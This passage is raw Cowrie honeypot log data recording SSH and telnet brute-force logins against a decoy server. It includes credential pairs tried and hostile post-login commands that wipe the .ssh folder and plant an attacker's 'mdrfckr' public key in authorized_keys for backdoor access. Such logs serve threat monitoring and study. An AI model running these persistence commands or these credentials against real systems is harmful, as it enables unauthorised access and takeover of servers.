512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:51:41.571538Z","src_ip":"212.227.125.160","session":"fffed7e9851f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@123","message":"login attempt [admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:51:43.609801Z","src_ip":"212.227.125.160","session":"fffed7e9851f"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:51:44.871781Z","src_ip":"212.227.125.160","session":"fffed7e9851f"}
{"eventid":"cowrie.session.connect","src_ip":"218.150.9.28","src_port":48936,"dst_ip":"1.2.3.4","dst_port":23,"session":"881f377c1720","protocol":"telnet","message":"New connection: 218.150.9.28:48936 (1.2.3.4:23) [session: 881f377c1720]","sensor":"my-vps","timestamp":"2025-08-26T13:52:01.714324Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37788,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bedf58d059c","protocol":"ssh","message":"New connection: 212.227.235.229:37788 (1.2.3.4:22) [session: 5bedf58d059c]","sensor":"my-vps","timestamp":"2025-08-26T13:52:11.393216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:52:11.394197Z","src_ip":"212.227.235.229","session":"5bedf58d059c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:52:11.623705Z","src_ip":"212.227.235.229","session":"5bedf58d059c"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty123$","message":"login attempt [root/Qwerty123$] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:52:12.583210Z","src_ip":"212.227.235.229","session":"5bedf58d059c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:52:13.062479Z","src_ip":"212.227.235.229","session":"5bedf58d059c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:52:13.063233Z","src_ip":"212.227.235.229","session":"5bedf58d059c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:52:13.064364Z","src_ip":"212.227.235.229","session":"5bedf58d059c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:52:13.304463Z","src_ip":"212.227.235.229","session":"5bedf58d059c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:52:13.889856Z","src_ip":"212.227.235.229","session":"5bedf58d059c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:52:13.890707Z","src_ip":"212.227.235.229","session":"5bedf58d059c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:52:14.122072Z","src_ip":"212.227.235.229","session":"5bedf58d059c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:52:14.123029Z","src_ip":"212.227.235.229","session":"5bedf58d059c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51086,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbb88e679e65","protocol":"ssh","message":"New connection: 212.227.235.229:51086 (1.2.3.4:22) [session: cbb88e679e65]","sensor":"my-vps","timestamp":"2025-08-26T13:52:14.360806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:52:14.361488Z","src_ip":"212.227.235.229","session":"cbb88e679e65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:52:14.600886Z","src_ip":"212.227.235.229","session":"cbb88e679e65"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:52:15.599634Z","src_ip":"212.227.235.229","session":"cbb88e679e65"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:52:16.842805Z","src_ip":"212.227.235.229","session":"cbb88e679e65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51090,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b13ea0cbd47","protocol":"ssh","message":"New connection: 212.227.235.229:51090 (1.2.3.4:22) [session: 7b13ea0cbd47]","sensor":"my-vps","timestamp":"2025-08-26T13:52:17.077110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:52:17.078135Z","src_ip":"212.227.235.229","session":"7b13ea0cbd47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:52:17.309696Z","src_ip":"212.227.235.229","session":"7b13ea0cbd47"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:52:18.281413Z","src_ip":"212.227.235.229","session":"7b13ea0cbd47"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:52:18.512304Z","src_ip":"212.227.235.229","session":"5bedf58d059c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:52:18.515233Z","src_ip":"212.227.235.229","session":"7b13ea0cbd47"}
{"eventid":"cowrie.session.closed","duration":31.498225212097168,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:52:33.212466Z","src_ip":"218.150.9.28","session":"881f377c1720"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49274,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3faa4e16e85","protocol":"ssh","message":"New connection: 212.227.235.229:49274 (1.2.3.4:22) [session: d3faa4e16e85]","sensor":"my-vps","timestamp":"2025-08-26T13:53:06.512318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:53:06.513265Z","src_ip":"212.227.235.229","session":"d3faa4e16e85"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:53:06.722507Z","src_ip":"212.227.235.229","session":"d3faa4e16e85"}
{"eventid":"cowrie.login.success","username":"root","password":"Pi123456","message":"login attempt [root/Pi123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:53:07.619103Z","src_ip":"212.227.235.229","session":"d3faa4e16e85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:53:08.144236Z","src_ip":"212.227.235.229","session":"d3faa4e16e85"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:53:08.144920Z","src_ip":"212.227.235.229","session":"d3faa4e16e85"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:53:08.146148Z","src_ip":"212.227.235.229","session":"d3faa4e16e85"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:53:08.388555Z","src_ip":"212.227.235.229","session":"d3faa4e16e85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:53:08.875555Z","src_ip":"212.227.235.229","session":"d3faa4e16e85"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:53:08.876214Z","src_ip":"212.227.235.229","session":"d3faa4e16e85"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:53:09.097704Z","src_ip":"212.227.235.229","session":"d3faa4e16e85"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:53:09.098611Z","src_ip":"212.227.235.229","session":"d3faa4e16e85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51144,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5dbef21fa3d","protocol":"ssh","message":"New connection: 212.227.235.229:51144 (1.2.3.4:22) [session: f5dbef21fa3d]","sensor":"my-vps","timestamp":"2025-08-26T13:53:09.318776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:53:09.320015Z","src_ip":"212.227.235.229","session":"f5dbef21fa3d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:53:09.539995Z","src_ip":"212.227.235.229","session":"f5dbef21fa3d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:53:10.379748Z","src_ip":"212.227.235.229","session":"f5dbef21fa3d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:53:11.570577Z","src_ip":"212.227.235.229","session":"f5dbef21fa3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52631,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cd70ea91821","protocol":"ssh","message":"New connection: 212.227.235.229:52631 (1.2.3.4:22) [session: 3cd70ea91821]","sensor":"my-vps","timestamp":"2025-08-26T13:53:11.817381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:53:11.818073Z","src_ip":"212.227.235.229","session":"3cd70ea91821"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:53:12.046826Z","src_ip":"212.227.235.229","session":"3cd70ea91821"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:53:13.266174Z","src_ip":"212.227.235.229","session":"3cd70ea91821"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:53:13.489914Z","src_ip":"212.227.235.229","session":"d3faa4e16e85"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:53:13.496262Z","src_ip":"212.227.235.229","session":"3cd70ea91821"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44160,"dst_ip":"1.2.3.4","dst_port":22,"session":"d66a1bafbae6","protocol":"ssh","message":"New connection: 212.227.235.229:44160 (1.2.3.4:22) [session: d66a1bafbae6]","sensor":"my-vps","timestamp":"2025-08-26T13:53:46.412079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:53:46.412991Z","src_ip":"212.227.235.229","session":"d66a1bafbae6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54268,"dst_ip":"1.2.3.4","dst_port":22,"session":"164af48db69c","protocol":"ssh","message":"New connection: 212.227.235.229:54268 (1.2.3.4:22) [session: 164af48db69c]","sensor":"my-vps","timestamp":"2025-08-26T13:53:49.390937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:53:49.392096Z","src_ip":"212.227.235.229","session":"164af48db69c"}
